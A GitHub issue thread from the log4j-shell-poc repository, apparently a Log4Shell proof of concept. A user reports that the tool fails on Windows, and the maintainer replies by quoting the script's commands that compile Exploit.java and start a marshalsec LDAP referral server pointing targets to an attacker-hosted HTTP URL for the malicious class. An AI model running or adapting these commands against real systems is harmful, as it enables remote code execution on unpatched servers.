### ISSUE TITLE
'.' is not recognized as an internal or external command, operable program or batch file.

### ISSUE THREAD

**Issue by nandaid** [kozmer/log4j-shell-poc#6]
How to install the module, i run this tool in windows 10

**Comment by kozmer** [comment]
We used Linux for this PoC. Could you please show me the output you are getting in your terminal?

**Comment by nandaid** [comment]
> We used Linux for this PoC. Could you please show me the output you are getting in your terminal?

![Screenshot_2021-12-15-01-24-34-80_2665fb67b16260a8d818298cef8dc107](https://user-images.githubusercontent.com/55502642/146057646-81db46b8-2f27-4cbe-8b11-fbcf4da8a066.jpg)

**Comment by kozmer** [comment]
Ah, I see. I think the issue is here with these snippets : `os.system('./jdk1.8.0_20/bin/javac Exploit.java')` & `os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://{}:{}/#Exploit".format(userip, userport))`. We did not really make this for support with Windows in mind. You could start up a Linux Docker and run it there with the necessary files or fix the command to work with Windows as it wouldn't be too difficult to just change it.
